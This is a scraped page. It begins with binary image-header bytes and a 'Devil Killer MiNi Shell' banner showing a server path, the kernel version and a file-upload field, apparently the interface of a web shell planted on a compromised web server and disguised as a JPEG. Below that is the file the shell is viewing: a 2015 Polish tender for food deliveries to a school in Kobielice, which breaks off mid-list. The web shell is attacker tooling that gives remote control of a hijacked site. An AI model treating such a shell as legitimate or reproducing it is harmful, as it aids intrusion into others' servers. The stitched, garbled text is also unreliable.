JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151210/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151210/337764-N-2015.html

<p class="kh_header"><b>Radostowice: Dostawa produktów spożywczych dla Szkoły Podstawowej im. Adama Mickiewicza w Kobielicach na 2016 r.</b><br>
<b>Numer ogłoszenia: 337764 - 2015; data zamieszczenia: 10.12.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szkoła Podstawowa im. Adama Mickiewicza w Kobielicach , ul. Topolowa 61, 43-262 Radostowice, woj. śląskie, tel. 32 212 52 26, faks 32 212 52 26.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spkobielice.edupage.org</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: samorządowa jednostka budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa produktów spożywczych dla Szkoły Podstawowej im. Adama Mickiewicza w Kobielicach na 2016 r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa produktów spożywczych dla Szkoły Podstawowej im. Adama Mickiewicza w Kobielicach na 2016 r., tj. od 04.01.2016 r. do 30.12.2016 r. obejmująca grupy towarów spożywczych zgodnie z załącznikami A do G. Zakres przedmiotu zamówienia został podzielony na VII  części. Wykonawca może złożyć ofertę na wybraną/ne do realizacji część/i zamówienia:
1.Część I - Pieczywo, świeże wyroby piekarskie i ciastkarskie - zgodnie z zał. A do SIWZ. 2. Część II-Mięso, wędliny, konserwy i wyroby mięsne -
zgodnie z zał. B do SIWZ. 3. Część III - Drób - zgodnie z zał. C do SIWZ. 4.Część  IV - Ryby - zgodnie z zał. D do SIWZ. 5.Część V - Warzywa, owoce i przetwory - zgodnie z zał. E do SIWZ. 6.Część VI - Oleje, tłuszcze zwierzęce i roślinne, produkty mleczarskie i jaja - zgodnie z zał. F do SIWZ. 7.Część VII - Pozostałe produkty spożywcze - zgodnie z zał. G do SIWZ..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>W przypadku zwiększenia się liczby żywionych uczniów, np. w przypadku  utworzenia dodatkowych oddziałów lub zwiększenia się liczby korzystających z żywienia uczniów. W takim wypadku Zamawiający może zamówić większą ilość asortymentu, niż została przewidziana w załącznikach od A do G.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9, 15.00.00.00-8, 15.20.00.00-0, 15.30.00.00-1, 15.40.00.00-2, 15.50.00.00-3, 15.60.00.00-4, 15.80.00.00-6, 15.81.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełnienia warunku wykonawcy zobowiązani są wypełnić oświadczenie wykonawcy o spełnieniu warunków udziału w postępowaniu (oświadczenie z art. 22 ust. 1 ustawy, na podstawie art. 44 ustawy) - załącznik nr 3 do SIWZ,</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełnienia warunku wykonawcy zobowiązani są wypełnić oświadczenie wykonawcy o spełnieniu warunków udziału w postępowaniu (oświadczenie z art. 22 ust. 1 ustawy, na podstawie art. 44 ustawy) - załącznik nr 3 do SIWZ,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełnienia warunku wykonawcy zobowiązani są wypełnić oświadczenie wykonawcy o spełnieniu warunków udziału w postępowaniu (oświadczenie z art. 22 ust. 1 ustawy, na podstawie art. 44 ustawy) - załącznik nr 3 do SIWZ,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełnienia warunku wykonawcy zobowiązani są wypełnić oświadczenie wykonawcy o spełnieniu warunków udziału w postępowaniu (oświadczenie z art. 22 ust. 1 ustawy, na podstawie art. 44 ustawy) - załącznik nr 3 do SIWZ,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełnienia warunku wykonawcy zobowiązani są wypełnić oświadczenie wykonawcy o spełnieniu warunków udziału w postępowaniu (oświadczenie z art. 22 ust. 1 ustawy, na podstawie art. 44 ustawy) - załącznik nr 3 do SIWZ,</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Zgodnie z punktem III 3.2 niniejszego ogłoszenia;;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca może złożyć jedną ofertę. Złożenie większej liczby ofert lub oferty zawierającej rozwiązania alternatywne lub oferty wariantowej, spowoduje odrzucenie wszystkich ofert złożonych przez danego Wykonawcę. Oferta musi być wypełniona zgodnie z treścią zał. nr 1 do SIWZ i podpisana przez   osoby (osobę) uprawnione/ą do składania oświadczeń woli w imieniu wykonawcy (podpis(y) winien być opatrzony pieczęcią imienną osoby (osób) uprawnionych do składania oświadczeń woli w imieniu wykonawcy, a w przypadku braku pieczęci należy złożyć czytelny podpis określający imię i nazwisko w/w osoby (osób).Wraz z ofertą należy złożyć odpowiednio na każdą wybraną do realizacji część, wypełnione zał. A-G do SIWZ, stanowiące formularze cenowe,</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Kierując się zapisami art. 144 ust. 1 Ustawy dnia 29 stycznia 2004 r. Prawo zamówień publicznych Zamawiający dopuszcza dokonanie zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w następujących sytuacjach: 1.zmiany ustawowej stawki podatku VAT - w takim przypadku obniżenie lub podwyższenie wynagrodzenia jest możliwe w wysokości odpowiadającej zmianie podatku, 2.dopuszcza się na wniosek WYKONAWCY kwartalną waloryzację cen dostarczanych produktów spożywczych w oparciu o wskaźnik cen towarów i usług konsumpcyjnych ogółem w danym kwartale, podawanym przez Prezesa Głównego Urzędu Statystycznego, ogłaszany w Dzienniku Urzędowym R.P. Monitor Polski. Warunkiem zastosowania waloryzacji, o której mowa wyżej jest wzrost tego wskaźnika ponad 3 % w stosunku kwartał do poprzedniego kwartału, 3.wystąpienia siły wyższej uniemożliwiającej wykonanie przedmiotu umowy zgodnie ze SIWZ, 4.zmiany powszechnie obowiązującego prawa w zakresie mającym wpływ na realizację umowy po dacie odniesienia, 5.gdy istnieje obiektywna konieczność wprowadzenia zmian, np. gdy spełnienie świadczenia byłoby połączone z nadmiernymi trudnościami albo groziłoby jednej ze stron rażącą stratą w rozumieniu art. 357 KC, 6.w przypadku zwiększenia się liczby żywionych uczniów, np. w przypadku  utworzenia dodatkowych oddziałów lub zwiększenia się liczby korzystających z żywienia uczniów. W takim wypadku Zamawiający może zamówić większą ilość asortymentu, niż została przewidziana w załącznikach od A do G. 7.Zmiana wynika z okoliczności, których nie można było przewidzieć w momencie zawarcia umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.spkobielice.edupage.org<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szkoła Podstawowa im. A. Mickiewicza w Kobielicach, ul. Topolowa 61, 43-262 Radostowice.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.12.2015 godzina 08:00, miejsce: Szkoła Podstawowa im. A. Mickiewicza w Kobielicach, ul. Topolowa 61, 43-262 Radostowice.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> PIECZYWO, ŚWIEŻE WYROBY PIEKARSKIE I CIASTKARSKIE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Francuskie (różne) 150 g, szt.60; 2.Półfrancuskie 140 g,szt.30; 3.Babeczki kruche z owocami 180g.szt.30; 4.Babka cytrynowa 300g,szt.40; 5.Babka drożdżowa z rodzynkami 450g,szt.6; 6.Babka firmowa 450g, szt.6; 7.Babka jogurtowa 500g, szt.6; 8.Babka piaskowa 550g	szt. 40; 9.Biszkopty, kg 2;10.Bułka grahamka 80g, szt.120; 11.Bułka jogurtowa 80g szt.10; 12.Bułka kajzerka 50g szt.600; 13.Bułka kajzerka pełnoziarnista 50g, szt600; 14.Bułka kanapkowa krojona (wek 300g), szt.200; 15. Bułka kukurydziana 70g szt.120; 16.Bułka maślana 80g, szt.150; 17.Bułka maślana pełnoziarnista 80g	szt 150; 18.Bułka pikantno-pomidorowa 65g	szt.20; 19.Bułka pikantno-serowa 65g szt. 20; 20.Bułka serce 100g, szt. 20; 21.Bułka serowa 70g, szt. 80; 22.Bułka staropolska 100g, szt. 1700; 23.Bułka szpinakowa 100g, szt 70; 24.Bułka tarta bez glutenu 0,5kg, kg 150; 25.Bułka zwykła 90g, szt.1500; 26.Bułka żytnia 70g, szt. 60; 27.Chleb 900g krojony, szt.300; 28.Chleb czystoziarnisty krojony 450g, szt. 6; 29.Chleb dietetyczny krojony 350g , szt.2; 30.Chleb graham krojony 450g, szt. 6; 31.Chleb krajan krojony 450g, szt. 60; 32.Chleb krojony ze słonecznikiem 500 g, szt. 50; 33.Chleb kukurydziany 450g  krojony, szt. 2; 34.Chleb orkiszowy krojony, kg 4; 35.Chleb pełne ziarno krojony 450g, szt 6; 36.Chleb wieloziarnisty, krojony, 500g. szt. 10; 37.Chleb witalny krojony 500g, szt. 5; 38.Chleb z błonnikiem krojony 600g, szt. 5; 39.Chleb żytni z koperkiem krojony 400g , szt. 5; 40.Ciasto zebra, kg 4; 41. Crossanty  z nadzieniem owocowym, kg. 6; 42. Crossanty z nadzieniem marcepanowym, kg. 6; 43.Drożdżówka (różne smaki) 160 g, szt. 60; 44.Drożdżówka Mini (różne) 100g, szt. 140; 45.Drożdżówka pełnoziarnista z cynamonem 140g, szt	40; 46.Drożdżówka pełnoziarnista z jabłkiem 140g, szt. 40; 47.Drożdżówka pełnoziarnista z owocami sezonowymi 140g, szt. 40; 48.Drożdżówka pełnoziarnista z serem 140g, szt. 40; 49.Drożdżówka podwójna 140g, szt. 30; 50.Francuskie z marcepanem 150g, szt. 30; 51.Groszek ptysiowy, kg 2; 52.Herbatniki kruche różne rodzaje, kg 3; 53. Jagodzianka 130g, szt. 30; 54.Kanapka pełnoziarnista (różne)  140g, szt. 30; 55.Keks 450g, szt. 20; 56.Kołocz z jabłkami, kg 10; 57.Kołocz z posypką, kg 5; 58.Muffinka różne smaki 70g, szt. 10; 59.Pączki (różne)100g, szt. 60; 60.Pączki serowe małe ,kg 4; 61.Rogal maślany pełnoziarnisty 100g, szt. 150; 62.Rogal z nadzieniem (różne)150g, szt. 80; 63.Rogalik zwykły 100g, szt. 150; 64.Szarlotka na kruchym, kg 3;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.81.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 04.01.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> MIĘSO, WĘDLINY, KONSERWY I WYROBY MIĘSNE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Boczek wędzony, kg	15; 2. Frankfuterki 70% mięsa w 100g produktu	kg 5; 3. Kiełbasa domowa - śląska 70% mięsa w 100g produktu, kg 80; 4. Kiełbasa drobiowa krojona 70% mięsa w 100g produktu, kg 15; 5. Kiełbasa kasztelańska krojona 70% mięsa w 100g produktu, kg 3; 6. Kiełbasa szynkowa krojona 70% mięsa w 100g produktu, kg 5; 7. Kiełbasa zwyczajna , kg 140; 8. Kiełbaska win erka 70% mięsa w 100g produktu, kg 30; 9. Kiełbaski orawskie 70% mięsa w 100g produktu, kg 5; 10. Kiełbaski śląskie 70% mięsa w 100g produktu, kg 30; 11. Kostka wołowa gulaszowe, kg 60; 12. Kości wędzone, kg 50; 13. Kulka wieprzowa , kg 150; 14. Łopatka wieprzowa b/k	kg 250; 15. Mielonka 70% mięsa w 100g produktu, kg 10; 16. Mięso garmażeryjne, kg 200; 17. Parówki z szynki70% mięsa w 100g produktu	kg 5; 18. Pasztet drobiowy 160g, wartość energ. W 100g produktu: 220 kcal, białko 7,5 g, węglowodany 5,5 g, tłuszcze 16,3 g	p	60; 19. Pasztet wieprzowy 	kg	2; 20. Polędwica wieprzowa gotowana krojona	kg	15; 21. Pręga wołowa B/K, kg	60; 22. Schab pieczony krojona, kg	5; 23. Schab z kością, kg	300; 24. Szynka drobiowa krojona, kg 10; 25. Szynka konserwowa krojona, kg	4; 26. Szynka koperkowa krojona 70% mięsa w 100g produktu, kg 4; 27. Szynka mielona krojona  70% mięsa w 100g produktu, kg 6; 28. Szynka wiejska krojona, kg 5; 29. Szynka wieprzowa krojona, kg 2; 30. Udziec wieprzowa B/K, kg 10; 31. Udziec wołowy b/k, kg 60; 32. Żeberka wędzone, kg 2; 33. Żeberka wieprzowe, kg 2;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 04.01.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> DRÓB.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Filet z indyka, kg 60; 2. Filet z kurczaka, kg 320; 3. Kurczak, kg 50; 4. Mięso gulaszowe z indyka, kg	180; 5. Podudzie z kurczaka (pałka), kg 130; 6. Porcje rosołowe, kg 170; 7. Trybowany udziec z indyka bez kości, kg 70; 8. Udziec z indyka, kg 60; 9. Udziec z kurczaka, kg 200; 10. Wątroba z indyka, kg 12; 11. Żołądki z kurczaka, kg	4;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 04.01.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> RYBY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Filet z makreli w sosie pomidorowym 170g puszka, szt 12; 2. Filet z makreli w oleju 170g puszka, szt 12; 3. Filet mrożony z soli, kg 150; 4. Filet mrożony z dorsza, kg 40; 5. Makrela wędzona, kg 3; 6. Paluszki rybne panierowana - mrożone 60% filet rybny, wartość energ w 100g 230 kcal, kg 10; 7. Tuńczyk w sosie własnym 170g puszka, szt 10;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.20.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 04.01.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> WARZYWA , OWOCE I PRZETWORY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Ananas plastry w puszce 450g, szt. 4; 2. Arbuz , kg 10; 3. Banan, kg	600; 4. Brokuł mrożony 450g, szt. 80; 5. Brokuł świeży, szt. 5; 6. Brzoskwinie kondensowane w puszce 850 g, szt. 4; 7. Brzoskwinie świeże, szt. 300; 8. Brzoskwinie świeże, kg	300; 9. Buraki ,kg	250; 10. Cebula ,kg 300; 11. Czosnek	szt.	100; 12. Dżem niskosłodzony 280g , bez konserwantów, zawartość cukru w 100g do 10g, szt.	110; 13. Fasola Jaś, kg 50; 14. Fasola szparagowa 450g, szt.	4; 15. Groch łuskany, kg 15; 16. Groszek - mrożonka, 450g.	szt.	5; 17. Groszek konserwowy 400g, szt 30; 18. Gruszka, kg 150; 19. Jabłka, kg 400; 20. Kalafior mrożony 450g, szt. 150; 21. Kalafior świeży, szt. 10; 22. Kalarepa ,szt. 4; 23. Kapusta biała, kg	400; 24. Kapusta biała nowa, szt. 80; 25. Kapusta czerwona, kg 150; 26. Kapusta czerwona nowa, szt. 30; 27. Kapusta kiszona, kg 250; 28. Kapusta pekińska, szt. 80; 29. Kapusta pekińska, kg 40; 30. Kiwi, szt 300; 31. Koncentrat buraczany 300ml 59,3% buraków ćwikłowych, szt 4; 32. Koncentrat pomidorowy 30% 1l, szt. 120; 33. Kukurydza konserwowa 400g, 74 kcal w 100g, szt. 4; 34. Mandarynka, kg 150; 35. Marchew, kg 300; 36. Marchewka z groszkiem - mrożonka, 450g., szt.	4; 37. Mrożonka zupa 450g ,szt. 70; 38. Nektarynka	kg	150; 39. Nektarynka, szt. 300; 40. Ogórek kiszony, kg 80; 41. Ogórek konserwowy 0,9l., szt.  150; 42. Ogórek zielony, kg 200; 43. Papryka konserwowa 0,9 l, szt 20; 44. Papryka świeża, kg 40; 45. Pieczarka, kg 120; 46. Pietruszka, kg 40; 47. Pomarańcza, kg 150; 48. Pomidor, kg 40; 49. Por, szt. 200; 50. Rzodkiewka pęczek, szt 40; 